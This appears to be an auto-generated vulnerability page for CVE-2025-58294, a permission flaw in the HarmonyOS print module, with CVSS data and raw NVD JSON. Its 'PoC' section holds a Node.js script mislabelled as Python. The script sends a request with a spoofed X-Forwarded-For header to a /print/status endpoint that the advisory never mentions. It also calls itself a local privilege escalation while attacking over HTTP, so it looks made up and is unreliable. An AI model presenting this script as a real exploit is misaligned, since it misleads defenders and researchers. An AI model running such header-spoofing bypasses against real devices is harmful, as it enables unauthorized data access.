Security Vulnerability Report
中文
CVE-2025-58294 CVSS 6.2 MEDIUM

CVE-2025-58294

Published: 2025-11-28 03:15:59
Last Modified: 2025-12-02 02:26:03

Description

Permission control vulnerability in the print module. Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:huawei:harmonyos:6.0.0:*:*:*:*:*:*:* - VULNERABLE
华为设备打印模块(具体版本需参考华为官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58294 PoC - Local privilege escalation in Huawei print module // This PoC demonstrates unauthorized access to print service data const http = require('http'); // Target: Huawei device with vulnerable print module const targetHost = '192.168.1.1'; const targetPort = 80; // Construct malicious request to bypass permission control const options = { hostname: targetHost, port: targetPort, path: '/print/status', method: 'GET', headers: { 'User-Agent': 'Huawei-PrintService/1.0', 'X-Forwarded-For': '127.0.0.1', 'Accept': '*/*' } }; console.log('[+] CVE-2025-58294 PoC'); console.log('[+] Target:', targetHost); console.log('[+] Attempting to bypass permission control...'); const req = http.request(options, (res) => { let data = ''; res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { console.log('[+] Response Status:', res.statusCode); console.log('[+] Response Data:', data); // Check if sensitive data is accessible without authentication if (res.statusCode === 200 && data.includes('confidential')) { console.log('[!] VULNERABLE: Unauthorized access to confidential data confirmed'); } else { console.log('[-] Target may not be vulnerable or patched'); } }); }); req.on('error', (e) => { console.error('[-] Request failed:', e.message); }); req.end(); // Note: This PoC is for educational and authorized testing purposes only

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58294", "sourceIdentifier": "[email protected]", "published": "2025-11-28T03:15:59.077", "lastModified": "2025-12-02T02:26:03.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Permission control vulnerability in the print module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-264"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "738D803A-C4CE-477B-BC89-CE47351C0A84"}, {"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39DE6A6-CBE6-4086-93CD-113D1B3BA730"}, {"vulnerable": true, "criteria": "cpe:2.3:o:huawei:harmonyos:6.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0EBE30DD-E146-4A6A-BE68-DEF9D4D0B2A8"}]}]}], "references": [{"url": "https://consumer.huawei.com/en/support/bulletin/2025/11/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}